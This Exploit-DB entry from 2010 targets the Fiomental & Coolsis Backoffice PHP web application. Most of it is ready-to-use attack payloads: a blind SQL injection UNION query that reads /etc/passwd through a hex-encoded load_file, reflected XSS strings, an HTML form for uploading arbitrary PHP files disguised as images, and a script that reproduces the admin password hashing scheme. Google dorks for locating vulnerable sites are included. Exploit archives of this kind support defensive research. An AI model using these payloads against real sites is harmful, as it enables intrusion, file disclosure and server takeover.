Fiomental & Coolsis Backoffice - Multiple Vulnerabilities

EDB-ID:

12563

CVE:

N/A

EDB Verified:

Author:

MasterGipy

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-05-10

Vulnerable App: 
      ______                _       _   _             
      | ___ \              | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   
      | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |   
      \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
         | |  __/ (_| | | | | | | \ |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/
         
                           DEFACEMENT it's for script kiddies...
_____________________________________________________________
   
[$] Exploit Title     : Fiomental & Coolsis Backoffice Multi Vulnerability
[$] Date              : 10-05-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Multi Vulnerability
[$] Site              : http://www.fiomental.com/
[$] Google Dork       : "Desenvolvido por: Fio Mental" or
                        "Desenvolvido por: coolsis"


[%] vulnerable file: index.php


[BLIND SQL INJECTION]

[$] Exploit:

[+] http://example.pt/?cod=1  <- SQL
[+] sql_1: -1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 and '1'='1
[+] sql_2: -1' UNION ALL SELECT 1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9,10 and '1'='1



[XSS]

[+] http://[site]/index.php/>"><script>alert(/LOL/)</script>


[%] vulnerable file: /admin/index2.php


[REMOTE ARBITRARY UPLOAD VULNERABILITY]

[$] Exploit:

<html>
<form action="http://<-- CHANGE HERE -->/admin/index2.php?sc=up1&ac=a1" method="post" enctype="multipart/form-data" name="form1">
<p align="center">
<input name="ficheiro" type="file" class="file" id="ficheiro"> 
<input name="ok" type="submit" class="button" id="ok" value="OK">
</p>
<p align="center">(only gif png jpg are allowed) </p>
<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
</form>
</html>


[XSS]

[$] http://[site]/admin/index2.php?&cod=1&ac=a1&tituloSc=<script>alert(/LOL/)</script>
(you need to login for this one)



[%] EXTRA:

[$] Admin Panel Password Algorithm 

<?php
$login = "test";
$pass = "test";

$total = md5(($login . 'fiomental').(md5($pass)));
// md5($salt.md5($pass)
echo "$total"; // This will Print the password Hash.
?>



[§] Greetings from PORTUGAL ^^
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services